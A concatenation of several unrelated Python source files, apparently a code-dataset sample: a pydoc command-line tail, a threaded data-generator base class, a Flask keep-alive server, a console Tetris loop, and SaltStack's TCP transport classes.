except KeyboardInterrupt:
pass
# -------------------------------------------------- command-line interface
def ispath(x):
return isinstance(x, str) and find(x, os.sep) >= 0
def cli():
"""Command-line interface (looks at sys.argv to decide what to do)."""
import getopt
class BadUsage: pass
# Scripts don't get the current directory in their path by default
# unless they are run with the '-m' switch
if '' not in sys.path:
scriptdir = os.path.dirname(sys.argv[0])
if scriptdir in sys.path:
sys.path.remove(scriptdir)
sys.path.insert(0, '.')
try:
opts, args = getopt.getopt(sys.argv[1:], 'gk:p:w')
writing = 0
for opt, val in opts:
if opt == '-g':
gui()
return
if opt == '-k':
apropos(val)
return
if opt == '-p':
try:
port = int(val)
except ValueError:
raise BadUsage
def ready(server):
print 'pydoc server ready at %s' % server.url
def stopped():
print 'pydoc server stopped'
serve(port, ready, stopped)
return
if opt == '-w':
writing = 1
if not args: raise BadUsage
for arg in args:
if ispath(arg) and not os.path.exists(arg):
print 'file %r does not exist' % arg
break
try:
if ispath(arg) and os.path.isfile(arg):
arg = importfile(arg)
if writing:
if ispath(arg) and os.path.isdir(arg):
writedocs(arg)
else:
writedoc(arg)
else:
help.help(arg)
except ErrorDuringImport, value:
print value
except (getopt.error, BadUsage):
cmd = os.path.basename(sys.argv[0])
print """pydoc - the Python documentation tool
%s <name> ...
Show text documentation on something. <name> may be the name of a
Python keyword, topic, function, module, or package, or a dotted
reference to a class or function within a module or module in a
package. If <name> contains a '%s', it is used as the path to a
Python source file to document. If name is 'keywords', 'topics',
or 'modules', a listing of these things is displayed.
%s -k <keyword>
Search for a keyword in the synopsis lines of all available modules.
%s -p <port>
Start an HTTP server on the given port on the local machine.
%s -g
Pop up a graphical interface for finding and serving documentation.
%s -w <name> ...
Write out the HTML documentation for a module to a file in the current
directory. If <name> contains a '%s', it is treated as a filename; if
it names a directory, documentation is written for all the contents.
""" % (cmd, os.sep, cmd, cmd, cmd, cmd, os.sep)
if __name__ == '__main__': cli()
|
data_generator.py
|
"""
Copyright (c) Facebook, Inc. and its affiliates.
"""
import threading
import time
from abc import ABC, abstractmethod
class DataGenerator(ABC):
"""
    This class is an abstraction of a data generator which generates all kinds of data
    and stores it at a given location (local, cloud, etc.).
    It maintains details such as the start time and timeout value, and is responsible for
    starting the task process, monitoring its status, ending the task at the correct
    time and cleaning up the process properly when terminated.
"""
def __init__(self, timeout: float = -1) -> None:
self._finished = False
self._started = False
self.start_time = time.time()
        # Timeout in minutes; -1 if no timeout is set (run indefinitely until killed by the runner).
        self.timeout = timeout
@abstractmethod
def run(self) -> None:
"""
        This method must be implemented by a subclass.
The logic of how the data is generated should be put here.
"""
raise NotImplementedError()
def start(self, *args) -> None:
"""
        Start a separate thread which calls run() and keeps running until terminated.
"""
if not self._started:
self.start_time = time.time()
            thread = threading.Thread(target=self.run, args=args)
thread.daemon = True
thread.start()
self._started = True
def set_finished(self, finished: bool = True) -> None:
"""
Set task finish status
"""
self._finished = finished
def check_is_finished(self) -> bool:
"""
        Return whether the task has finished.
"""
return self._finished
def check_is_timeout(self) -> bool:
"""
        Return whether the task has timed out.
"""
if self.timeout == -1:
return False
if time.time() - self.start_time < self.timeout * 60:
return False
return True
def get_remaining_time(self) -> float:
"""
        Return the remaining time (in minutes) before the task times out.
"""
return self.timeout - ((time.time() - self.start_time) // 60)
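# --------------------------------------------------------------------------
# Illustrative sketch only (not part of the original module): a minimal
# concrete generator showing how run(), start(), set_finished() and
# check_is_timeout() are meant to work together. The class name
# CounterGenerator and the samples attribute are assumptions made for this
# example, not part of the real API.
class CounterGenerator(DataGenerator):
    def __init__(self, timeout: float = 1) -> None:
        super().__init__(timeout=timeout)
        self.samples = []
    def run(self) -> None:
        # Keep producing data until the task is finished or has timed out.
        while not self.check_is_finished() and not self.check_is_timeout():
            self.samples.append(time.time())
            time.sleep(1)
        self.set_finished()
# Hedged usage: gen = CounterGenerator(timeout=1); gen.start(); the runner
# would then poll gen.check_is_finished() / gen.check_is_timeout().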
|
runner.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
    return "Hogwarts' Hat"
def run():
    app.run(host='0.0.0.0', port=8080)
def alive():
    t = Thread(target=run)
    t.start()
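# Illustrative usage sketch (an assumption, not part of the original file):
# the keep-alive server is normally started once from the main script before
# the long-running work begins, e.g.
#
#     from runner import alive
#     alive()          # serves "/" on port 8080 in a background thread
#     run_main_loop()  # hypothetical long-running task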
|
main.py
|
from tetris import *
from random import *
import threading
def LED_init():
thread=threading.Thread(target=LMD.main, args=())
    thread.daemon = True
thread.start()
return
def rotate(m_array, rot_num):
N = len(m_array)
rot_m = [[0] * N for _ in range(N)]
if rot_num % 4 == 1:
for i in range(N):
for j in range(N):
rot_m[j][N-1-i] = m_array[i][j]
elif rot_num % 4 == 2:
for i in range(N):
for j in range(N):
rot_m[N-1-i][N-1-j] = m_array[i][j]
elif rot_num % 4 == 3:
for i in range(N):
for j in range(N):
rot_m[N-1-j][i] = m_array[i][j]
else:
for i in range(N):
for j in range(N):
rot_m[i][j] = m_array[i][j]
return rot_m
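# Worked example (illustrative, not part of the original file): with
#     m = [[1, 2],
#          [3, 4]]
# rotate(m, 1) maps m[i][j] -> rot_m[j][N-1-i], i.e. one 90-degree clockwise
# turn, giving [[3, 1], [4, 2]]; rot_num = 2 and 3 produce the 180- and
# 270-degree rotations, and any multiple of 4 returns a copy of the input.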
def initSetOfBlockArrays():
arrayBlks = [ [ [ 0, 0, 1, 0 ], # ㅁ
[ 0, 0, 1, 0 ], # ㅁ
[ 0, 0, 1, 0 ], # ㅁ
[ 0, 0, 1, 0 ] ], # ㅁ
[ [0, 1, 0],
[1, 1, 1], # ㅗ
[0, 0, 0] ],
[ [1, 0, 0],
[1, 1, 1], # ㄴ
[0, 0, 0] ],
[ [0, 0, 1], # ㅁ
[1, 1, 1], # ㅁㅁㅁ
[0, 0, 0] ], #
[ [1, 1], # ㅁ
[1, 1] ],
[ [0, 1, 1], # ㅁㅁ
[1, 1, 0], # ㅁㅁ
[0, 0, 0] ], #
[ [1, 1, 0], # ㅁㅁ
[0, 1, 1], # ㅁㅁ
[0, 0, 0] ] #
]
nBlocks = len(arrayBlks)
setOfBlockArrays = [[0] * 4 for _ in range(nBlocks)]
for idxBlockType in range(nBlocks):
for idxBlockDegree in range(4):
rotate_matrix = rotate(arrayBlks[idxBlockType], idxBlockDegree)
setOfBlockArrays[idxBlockType][idxBlockDegree] = rotate_matrix
return setOfBlockArrays
if __name__ == "__main__":
#LED_init()
setOfBlockArrays = initSetOfBlockArrays()
Tetris.init(setOfBlockArrays)
board = Tetris(32, 16)
idxBlockType = randint(0, 6)
key = '0' + str(idxBlockType)
board.accept(key)
board.printScreen()
    while True:
key = input('Enter a key from [ q (quit), a (left), d (right), s (down), w (rotate), \' \' (drop) ] : ')
if key != 'q':
state = board.accept(key)
board.printScreen()
if(state == TetrisState.NewBlock):
idxBlockType = randint(0, 6)
key = '0' + str(idxBlockType)
state = board.accept(key)
if(state == TetrisState.Finished):
board.printScreen()
print('Game Over!!!')
break
board.printScreen()
else:
print('Game aborted...')
break
print('Program terminated...')
### end of pytet.py
|
tcp.py
|
"""
TCP transport classes
Wire protocol: "len(payload) msgpack({'head': SOMEHEADER, 'body': SOMEBODY})"
"""
import errno
import logging
import os
import queue
import socket
import threading
import time
import traceback
import urllib.parse as urlparse
import weakref
import salt.crypt
import salt.exceptions
import salt.ext.tornado
import salt.ext.tornado.concurrent
import salt.ext.tornado.gen
import salt.ext.tornado.iostream
import salt.ext.tornado.netutil
import salt.ext.tornado.tcpclient
import salt.ext.tornado.tcpserver
import salt.payload
import salt.transport.client
import salt.transport.frame
import salt.transport.ipc
import salt.transport.mixins.auth
import salt.transport.server
import salt.utils.asynchronous
import salt.utils.event
import salt.utils.files
import salt.utils.msgpack
import salt.utils.platform
import salt.utils.process
import salt.utils.verify
import salt.utils.versions
from salt.exceptions import SaltClientError, SaltReqTimeoutError
from salt.transport import iter_transport_opts
try:
from M2Crypto import RSA
HAS_M2 = True
except ImportError:
HAS_M2 = False
try:
from Cryptodome.Cipher import PKCS1_OAEP
except ImportError:
from Crypto.Cipher import PKCS1_OAEP
if salt.utils.platform.is_windows():
USE_LOAD_BALANCER = True
else:
USE_LOAD_BALANCER = False
if USE_LOAD_BALANCER:
import threading
import multiprocessing
import salt.ext.tornado.util
from salt.utils.process import SignalHandlingProcess
log = logging.getLogger(__name__)
def _set_tcp_keepalive(sock, opts):
"""
Ensure that TCP keepalives are set for the socket.
"""
if hasattr(socket, "SO_KEEPALIVE"):
if opts.get("tcp_keepalive", False):
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
if hasattr(socket, "SOL_TCP"):
if hasattr(socket, "TCP_KEEPIDLE"):
tcp_keepalive_idle = opts.get("tcp_keepalive_idle", -1)
if tcp_keepalive_idle > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPIDLE, int(tcp_keepalive_idle)
)
if hasattr(socket, "TCP_KEEPCNT"):
tcp_keepalive_cnt = opts.get("tcp_keepalive_cnt", -1)
if tcp_keepalive_cnt > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPCNT, int(tcp_keepalive_cnt)
)
if hasattr(socket, "TCP_KEEPINTVL"):
tcp_keepalive_intvl = opts.get("tcp_keepalive_intvl", -1)
if tcp_keepalive_intvl > 0:
sock.setsockopt(
socket.SOL_TCP,
socket.TCP_KEEPINTVL,
int(tcp_keepalive_intvl),
)
if hasattr(socket, "SIO_KEEPALIVE_VALS"):
# Windows doesn't support TCP_KEEPIDLE, TCP_KEEPCNT, nor
# TCP_KEEPINTVL. Instead, it has its own proprietary
# SIO_KEEPALIVE_VALS.
tcp_keepalive_idle = opts.get("tcp_keepalive_idle", -1)
tcp_keepalive_intvl = opts.get("tcp_keepalive_intvl", -1)
# Windows doesn't support changing something equivalent to
# TCP_KEEPCNT.
if tcp_keepalive_idle > 0 or tcp_keepalive_intvl > 0:
# Windows defaults may be found by using the link below.
# Search for 'KeepAliveTime' and 'KeepAliveInterval'.
# https://technet.microsoft.com/en-us/library/bb726981.aspx#EDAA
# If one value is set and the other isn't, we still need
# to send both values to SIO_KEEPALIVE_VALS and they both
# need to be valid. So in that case, use the Windows
# default.
if tcp_keepalive_idle <= 0:
tcp_keepalive_idle = 7200
if tcp_keepalive_intvl <= 0:
tcp_keepalive_intvl = 1
# The values expected are in milliseconds, so multiply by
# 1000.
sock.ioctl(
socket.SIO_KEEPALIVE_VALS,
(
1,
int(tcp_keepalive_idle * 1000),
int(tcp_keepalive_intvl * 1000),
),
)
else:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 0)
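# Illustrative usage sketch (an assumption, not part of the original module):
# the helper expects a plain socket plus a Salt opts dict carrying the
# "tcp_keepalive*" settings used above, e.g.
#
#     sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#     _set_tcp_keepalive(sock, {
#         "tcp_keepalive": True,
#         "tcp_keepalive_idle": 300,   # seconds of idle time before probing
#         "tcp_keepalive_cnt": 3,      # failed probes before dropping the link
#         "tcp_keepalive_intvl": 60,   # seconds between probes
#     })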
if USE_LOAD_BALANCER:
class LoadBalancerServer(SignalHandlingProcess):
"""
Raw TCP server which runs in its own process and will listen
for incoming connections. Each incoming connection will be
sent via multiprocessing queue to the workers.
Since the queue is shared amongst workers, only one worker will
handle a given connection.
"""
# TODO: opts!
# Based on default used in salt.ext.tornado.netutil.bind_sockets()
backlog = 128
def __init__(self, opts, socket_queue, **kwargs):
super().__init__(**kwargs)
self.opts = opts
self.socket_queue = socket_queue
self._socket = None
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on
# Windows.
def __setstate__(self, state):
self.__init__(
state["opts"],
state["socket_queue"],
log_queue=state["log_queue"],
log_queue_level=state["log_queue_level"],
)
def __getstate__(self):
return {
"opts": self.opts,
"socket_queue": self.socket_queue,
"log_queue": self.log_queue,
"log_queue_level": self.log_queue_level,
}
def close(self):
if self._socket is not None:
self._socket.shutdown(socket.SHUT_RDWR)
self._socket.close()
self._socket = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def run(self):
"""
Start the load balancer
"""
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(1)
self._socket.bind((self.opts["interface"], int(self.opts["ret_port"])))
self._socket.listen(self.backlog)
while True:
try:
# Wait for a connection to occur since the socket is
# blocking.
connection, address = self._socket.accept()
# Wait for a free slot to be available to put
# the connection into.
# Sockets are picklable on Windows in Python 3.
self.socket_queue.put((connection, address), True, None)
except OSError as e:
# ECONNABORTED indicates that there was a connection
# but it was closed while still in the accept queue.
# (observed on FreeBSD).
if (
salt.ext.tornado.util.errno_from_exception(e)
== errno.ECONNABORTED
):
continue
raise
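# Illustrative sketch of the hand-off described in LoadBalancerServer's
# docstring (an assumption, not part of the original module): the accepting
# process puts (connection, address) pairs on the shared queue and exactly
# one worker picks each pair up. The worker-side handler below is
# hypothetical.
#
#     socket_queue = multiprocessing.Queue()
#     LoadBalancerServer(opts, socket_queue).start()
#     ...
#     connection, address = socket_queue.get()   # blocks until a client connects
#     handle_connection(connection, address)     # hypothetical handler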
# TODO: move serial down into message library
class AsyncTCPReqChannel(salt.transport.client.ReqChannel):
"""
Encapsulate sending routines to tcp.
Note: this class returns a singleton
"""
# This class is only a singleton per minion/master pair
# mapping of io_loop -> {key -> channel}
instance_map = weakref.WeakKeyDictionary()
async_methods = [
"crypted_transfer_decode_dictentry",
"_crypted_transfer",
"_uncrypted_transfer",
"send",
]
close_methods = [
"close",
]
def __new__(cls, opts, **kwargs):
"""
Only create one instance of channel per __key()
"""
# do we have any mapping for this io_loop
io_loop = kwargs.get("io_loop") or salt.ext.tornado.ioloop.IOLoop.current()
if io_loop not in cls.instance_map:
cls.instance_map[io_loop] = weakref.WeakValueDictionary()
loop_instance_map = cls.instance_map[io_loop]
key = cls.__key(opts, **kwargs)
obj = loop_instance_map.get(key)
if obj is None:
log.debug("Initializing new AsyncTCPReqChannel for %s", key)
# we need to make a local variable for this, as we are going to store
# it in a WeakValueDictionary-- which will remove the item if no one
# references it-- this forces a reference while we return to the caller
obj = object.__new__(cls)
obj.__singleton_init__(opts, **kwargs)
obj._instance_key = key
loop_instance_map[key] = obj
obj._refcount = 1
obj._refcount_lock = threading.RLock()
else:
with obj._refcount_lock:
obj._refcount += 1
log.debug("Re-using AsyncTCPReqChannel for %s", key)
return obj
@classmethod
def __key(cls, opts, **kwargs):
if "master_uri" in kwargs:
opts["master_uri"] = kwargs["master_uri"]
return (
opts["pki_dir"], # where the keys are stored
opts["id"], # minion ID
opts["master_uri"],
kwargs.get("crypt", "aes"), # TODO: use the same channel for crypt
)
@classmethod
def force_close_all_instances(cls):
"""
Will force close all instances
:return: None
"""
for weak_dict in list(cls.instance_map.values()):
for instance in list(weak_dict.values()):
instance.close()
# has to remain empty for singletons, since __init__ will *always* be called
def __init__(self, opts, **kwargs):
pass
# an init for the singleton instance to call
def __singleton_init__(self, opts, **kwargs):
self.opts = dict(opts)
self.serial = salt.payload.Serial(self.opts)
# crypt defaults to 'aes'
self.crypt = kwargs.get("crypt", "aes")
self.io_loop = kwargs.get("io_loop") or salt.ext.tornado.ioloop.IOLoop.current()
if self.crypt != "clear":
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
resolver = kwargs.get("resolver")
parse = urlparse.urlparse(self.opts["master_uri"])
master_host, master_port = parse.netloc.rsplit(":", 1)
self.master_addr = (master_host, int(master_port))
self._closing = False
self.message_client = SaltMessageClientPool(
self.opts,
args=(self.opts, master_host, int(master_port),),
kwargs={
"io_loop": self.io_loop,
"resolver": resolver,
"source_ip": self.opts.get("source_ip"),
"source_port": self.opts.get("source_ret_port"),
},
)
def close(self):
if self._closing:
return
if self._refcount > 1:
# Decrease refcount
with self._refcount_lock:
self._refcount -= 1
log.debug(
"This is not the last %s instance. Not closing yet.",
self.__class__.__name__,
)
return
log.debug("Closing %s instance", self.__class__.__name__)
self._closing = True
self.message_client.close()
# Remove the entry from the instance map so that a closed entry may not
# be reused.
# This forces this operation even if the reference count of the entry
# has not yet gone to zero.
if self.io_loop in self.__class__.instance_map:
loop_instance_map = self.__class__.instance_map[self.io_loop]
if self._instance_key in loop_instance_map:
del loop_instance_map[self._instance_key]
if not loop_instance_map:
del self.__class__.instance_map[self.io_loop]
# pylint: disable=W1701
def __del__(self):
with self._refcount_lock:
# Make sure we actually close no matter if something
# went wrong with our ref counting
self._refcount = 1
try:
self.close()
except OSError as exc:
if exc.errno != errno.EBADF:
# If its not a bad file descriptor error, raise
raise
# pylint: enable=W1701
def _package_load(self, load):
return {
"enc": self.crypt,
"load": load,
}
@salt.ext.tornado.gen.coroutine
def crypted_transfer_decode_dictentry(
self, load, dictkey=None, tries=3, timeout=60
):
if not self.auth.authenticated:
yield self.auth.authenticate()
ret = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
key = self.auth.get_keys()
if HAS_M2:
aes = key.private_decrypt(ret["key"], RSA.pkcs1_oaep_padding)
else:
cipher = PKCS1_OAEP.new(key)
aes = cipher.decrypt(ret["key"])
pcrypt = salt.crypt.Crypticle(self.opts, aes)
data = pcrypt.loads(ret[dictkey])
data = salt.transport.frame.decode_embedded_strs(data)
raise salt.ext.tornado.gen.Return(data)
@salt.ext.tornado.gen.coroutine
def _crypted_transfer(self, load, tries=3, timeout=60):
"""
In case of authentication errors, try to renegotiate authentication
and retry the method.
Indeed, we can fail too early in case of a master restart during a
minion state execution call
"""
@salt.ext.tornado.gen.coroutine
def _do_transfer():
data = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
# we may not always have data to return; for example, a salt-call ret
# submission is a blind communication: we do not subscribe to return
# events, we just upload the results to the master
if data:
data = self.auth.crypticle.loads(data)
data = salt.transport.frame.decode_embedded_strs(data)
raise salt.ext.tornado.gen.Return(data)
if not self.auth.authenticated:
yield self.auth.authenticate()
try:
ret = yield _do_transfer()
raise salt.ext.tornado.gen.Return(ret)
except salt.crypt.AuthenticationError:
yield self.auth.authenticate()
ret = yield _do_transfer()
raise salt.ext.tornado.gen.Return(ret)
@salt.ext.tornado.gen.coroutine
def _uncrypted_transfer(self, load, tries=3, timeout=60):
ret = yield self.message_client.send(
self._package_load(load), timeout=timeout, tries=tries,
)
raise salt.ext.tornado.gen.Return(ret)
@salt.ext.tornado.gen.coroutine
def send(self, load, tries=3, timeout=60, raw=False):
"""
Send a request; return a future which will complete with the reply once it is received
"""
try:
if self.crypt == "clear":
ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout)
else:
ret = yield self._crypted_transfer(load, tries=tries, timeout=timeout)
except salt.ext.tornado.iostream.StreamClosedError:
# Convert to 'SaltClientError' so that clients can handle this
# exception more appropriately.
raise SaltClientError("Connection to master lost")
raise salt.ext.tornado.gen.Return(ret)
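# Rough usage sketch (not part of this module; assumes minion opts with
# "master_uri" set, a running IOLoop, and a hypothetical "_pillar" load):
#
#     channel = AsyncTCPReqChannel(opts, io_loop=io_loop)
#     ret = yield channel.send({"cmd": "_pillar", "id": opts["id"]},
#                              tries=3, timeout=60)
#     channel.close()
#
# send() encrypts the load with the AES session key unless the channel was
# created with crypt="clear", and resolves with the master's reply.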
class AsyncTCPPubChannel(
salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel
):
async_methods = [
"send_id",
"connect_callback",
"connect",
]
close_methods = [
"close",
]
def __init__(self, opts, **kwargs):
self.opts = opts
self.serial = salt.payload.Serial(self.opts)
self.crypt = kwargs.get("crypt", "aes")
self.io_loop = kwargs.get("io_loop") or salt.ext.tornado.ioloop.IOLoop.current()
self.connected = False
self._closing = False
self._reconnected = False
self.message_client = None
self.event = salt.utils.event.get_event("minion", opts=self.opts, listen=False)
def close(self):
if self._closing:
return
self._closing = True
if self.message_client is not None:
self.message_client.close()
self.message_client = None
if self.event is not None:
self.event.destroy()
self.event = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def _package_load(self, load):
return {
"enc": self.crypt,
"load": load,
}
@salt.ext.tornado.gen.coroutine
def send_id(self, tok, force_auth):
"""
Send the minion id to the master so that the master may better
track the connection state of the minion.
In case of authentication errors, try to renegotiate authentication
and retry the method.
"""
load = {"id": self.opts["id"], "tok": tok}
@salt.ext.tornado.gen.coroutine
def _do_transfer():
msg = self._package_load(self.auth.crypticle.dumps(load))
package = salt.transport.frame.frame_msg(msg, header=None)
yield self.message_client.write_to_stream(package)
raise salt.ext.tornado.gen.Return(True)
if force_auth or not self.auth.authenticated:
count = 0
while (
count <= self.opts["tcp_authentication_retries"]
or self.opts["tcp_authentication_retries"] < 0
):
try:
yield self.auth.authenticate()
break
except SaltClientError as exc:
log.debug(exc)
count += 1
try:
ret = yield _do_transfer()
raise salt.ext.tornado.gen.Return(ret)
except salt.crypt.AuthenticationError:
yield self.auth.authenticate()
ret = yield _do_transfer()
raise salt.ext.tornado.gen.Return(ret)
@salt.ext.tornado.gen.coroutine
def connect_callback(self, result):
if self._closing:
return
# Force re-auth on reconnect since the master
# may have been restarted
yield self.send_id(self.tok, self._reconnected)
self.connected = True
self.event.fire_event({"master": self.opts["master"]}, "__master_connected")
if self._reconnected:
# On reconnects, fire a master event to notify that the minion is
# available.
if self.opts.get("__role") == "syndic":
data = "Syndic {} started at {}".format(self.opts["id"], time.asctime())
tag = salt.utils.event.tagify([self.opts["id"], "start"], "syndic")
else:
data = "Minion {} started at {}".format(self.opts["id"], time.asctime())
tag = salt.utils.event.tagify([self.opts["id"], "start"], "minion")
load = {
"id": self.opts["id"],
"cmd": "_minion_event",
"pretag": None,
"tok": self.tok,
"data": data,
"tag": tag,
}
req_channel = salt.utils.asynchronous.SyncWrapper(
AsyncTCPReqChannel, (self.opts,), loop_kwarg="io_loop",
)
try:
req_channel.send(load, timeout=60)
except salt.exceptions.SaltReqTimeoutError:
log.info(
"fire_master failed: master could not be contacted. Request timed out."
)
except Exception: # pylint: disable=broad-except
log.info("fire_master failed: %s", traceback.format_exc())
finally:
# SyncWrapper will call either close() or destroy(), whichever is available
del req_channel
else:
self._reconnected = True
def disconnect_callback(self):
if self._closing:
return
self.connected = False
self.event.fire_event({"master": self.opts["master"]}, "__master_disconnected")
@salt.ext.tornado.gen.coroutine
def connect(self):
try:
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
self.tok = self.auth.gen_token(b"salt")
if not self.auth.authenticated:
yield self.auth.authenticate()
if self.auth.authenticated:
# if this is changed from the default, we assume it was intentional
if int(self.opts.get("publish_port", 4505)) != 4505:
self.publish_port = self.opts.get("publish_port")
# otherwise take the relayed publish_port the master reports
else:
self.publish_port = self.auth.creds["publish_port"]
self.message_client = SaltMessageClientPool(
self.opts,
args=(self.opts, self.opts["master_ip"], int(self.publish_port)),
kwargs={
"io_loop": self.io_loop,
"connect_callback": self.connect_callback,
"disconnect_callback": self.disconnect_callback,
"source_ip": self.opts.get("source_ip"),
"source_port": self.opts.get("source_publish_port"),
},
)
yield self.message_client.connect() # wait for the client to be connected
self.connected = True
# TODO: better exception handling...
except KeyboardInterrupt: # pylint: disable=try-except-raise
raise
except Exception as exc: # pylint: disable=broad-except
if "-|RETRY|-" not in str(exc):
raise SaltClientError(
"Unable to sign_in to master: {}".format(exc)
) # TODO: better error message
def on_recv(self, callback):
"""
Register an on_recv callback
"""
if callback is None:
return self.message_client.on_recv(callback)
@salt.ext.tornado.gen.coroutine
def wrap_callback(body):
if not isinstance(body, dict):
# TODO: For some reason we need to decode here for things
# to work. Fix this.
body = salt.utils.msgpack.loads(body)
body = salt.transport.frame.decode_embedded_strs(body)
ret = yield self._decode_payload(body)
callback(ret)
return self.message_client.on_recv(wrap_callback)
class TCPReqServerChannel(
salt.transport.mixins.auth.AESReqServerMixin, salt.transport.server.ReqServerChannel
):
# TODO: opts!
backlog = 5
def __init__(self, opts):
salt.transport.server.ReqServerChannel.__init__(self, opts)
self._socket = None
self.req_server = None
@property
def socket(self):
return self._socket
def close(self):
if self._socket is not None:
try:
self._socket.shutdown(socket.SHUT_RDWR)
except OSError as exc:
if exc.errno == errno.ENOTCONN:
# We may try to shutdown a socket which is already disconnected.
# Ignore this condition and continue.
pass
else:
raise
if self.req_server is None:
# We only close the socket if we don't have a req_server instance.
# If we do have one, the req_server is also handling this socket; when we call
# req_server.stop(), tornado would raise an AssertionError because it tries to
# match socket.fileno() (which is -1 after close) against the fd it holds in
# its _sockets cache in order to remove the socket from the IOLoop handlers.
self._socket.close()
self._socket = None
if self.req_server is not None:
try:
self.req_server.close()
except OSError as exc:
if exc.errno != 9:
raise
log.exception(
"TCPReqServerChannel close generated an exception: %s", str(exc)
)
self.req_server = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def pre_fork(self, process_manager):
"""
Pre-fork we need to create the request server's listening socket (or the load balancer queue)
"""
salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager)
if USE_LOAD_BALANCER:
self.socket_queue = multiprocessing.Queue()
process_manager.add_process(
LoadBalancerServer, args=(self.opts, self.socket_queue)
)
elif not salt.utils.platform.is_windows():
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(0)
self._socket.bind((self.opts["interface"], int(self.opts["ret_port"])))
def post_fork(self, payload_handler, io_loop):
"""
After forking we need to set up the message server that handles incoming requests
payload_handler: function to call with your payloads
"""
if self.opts["pub_server_niceness"] and not salt.utils.platform.is_windows():
log.info(
"setting Publish daemon niceness to %i",
self.opts["pub_server_niceness"],
)
os.nice(self.opts["pub_server_niceness"])
self.payload_handler = payload_handler
self.io_loop = io_loop
self.serial = salt.payload.Serial(self.opts)
with salt.utils.asynchronous.current_ioloop(self.io_loop):
if USE_LOAD_BALANCER:
self.req_server = LoadBalancerWorker(
self.socket_queue,
self.handle_message,
ssl_options=self.opts.get("ssl"),
)
else:
if salt.utils.platform.is_windows():
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(0)
self._socket.bind(
(self.opts["interface"], int(self.opts["ret_port"]))
)
self.req_server = SaltMessageServer(
self.handle_message,
ssl_options=self.opts.get("ssl"),
io_loop=self.io_loop,
)
self.req_server.add_socket(self._socket)
self._socket.listen(self.backlog)
salt.transport.mixins.auth.AESReqServerMixin.post_fork(
self, payload_handler, io_loop
)
@salt.ext.tornado.gen.coroutine
def handle_message(self, stream, header, payload):
"""
Handle incoming messages from underlying tcp streams
"""
try:
try:
payload = self._decode_payload(payload)
except Exception: # pylint: disable=broad-except
stream.write(salt.transport.frame.frame_msg("bad load", header=header))
raise salt.ext.tornado.gen.Return()
# TODO helper functions to normalize payload?
if not isinstance(payload, dict) or not isinstance(
payload.get("load"), dict
):
yield stream.write(
salt.transport.frame.frame_msg(
"payload and load must be a dict", header=header
)
)
raise salt.ext.tornado.gen.Return()
try:
id_ = payload["load"].get("id", "")
if "\0" in id_:
log.error("Payload contains an id with a null byte: %s", payload)
stream.write(salt.transport.frame.frame_msg("bad load: id contains a null byte", header=header))
raise salt.ext.tornado.gen.Return()
except TypeError:
log.error("Payload contains non-string id: %s", payload)
stream.write(
salt.transport.frame.frame_msg(
"bad load: id {} is not a string".format(id_), header=header
)
)
raise salt.ext.tornado.gen.Return()
# intercept the "_auth" commands, since the main daemon shouldn't know
# anything about our key auth
if (
payload["enc"] == "clear"
and payload.get("load", {}).get("cmd") == "_auth"
):
yield stream.write(
salt.transport.frame.frame_msg(
self._auth(payload["load"]), header=header
)
)
raise salt.ext.tornado.gen.Return()
# TODO: test
try:
ret, req_opts = yield self.payload_handler(payload)
except Exception as e: # pylint: disable=broad-except
# always attempt to return an error to the minion
stream.write("Some exception handling minion payload")
log.error(
"Some exception handling a payload from minion", exc_info=True
)
stream.close()
raise salt.ext.tornado.gen.Return()
req_fun = req_opts.get("fun", "send")
if req_fun == "send_clear":
stream.write(salt.transport.frame.frame_msg(ret, header=header))
elif req_fun == "send":
stream.write(
salt.transport.frame.frame_msg(
self.crypticle.dumps(ret), header=header
)
)
elif req_fun == "send_private":
stream.write(
salt.transport.frame.frame_msg(
self._encrypt_private(ret, req_opts["key"], req_opts["tgt"],),
header=header,
)
)
else:
log.error("Unknown req_fun %s", req_fun)
# always attempt to return an error to the minion
stream.write("Server-side exception handling payload")
stream.close()
except salt.ext.tornado.gen.Return:
raise
except salt.ext.tornado.iostream.StreamClosedError:
# Stream was closed. This could happen if the remote side
# closed the connection on its end (eg in a timeout or shutdown
# situation).
log.error("Connection was unexpectedly closed", exc_info=True)
except Exception as exc: # pylint: disable=broad-except
# Absorb any other exceptions
log.error("Unexpected exception occurred: %s", exc, exc_info=True)
raise salt.ext.tornado.gen.Return()
class SaltMessageServer(salt.ext.tornado.tcpserver.TCPServer):
"""
Raw TCP server which will receive all of the TCP streams and re-assemble
messages that are sent through to us
"""
def __init__(self, message_handler, *args, **kwargs):
io_loop = (
kwargs.pop("io_loop", None) or salt.ext.tornado.ioloop.IOLoop.current()
)
self._closing = False
super().__init__(*args, **kwargs)
self.io_loop = io_loop
self.clients = []
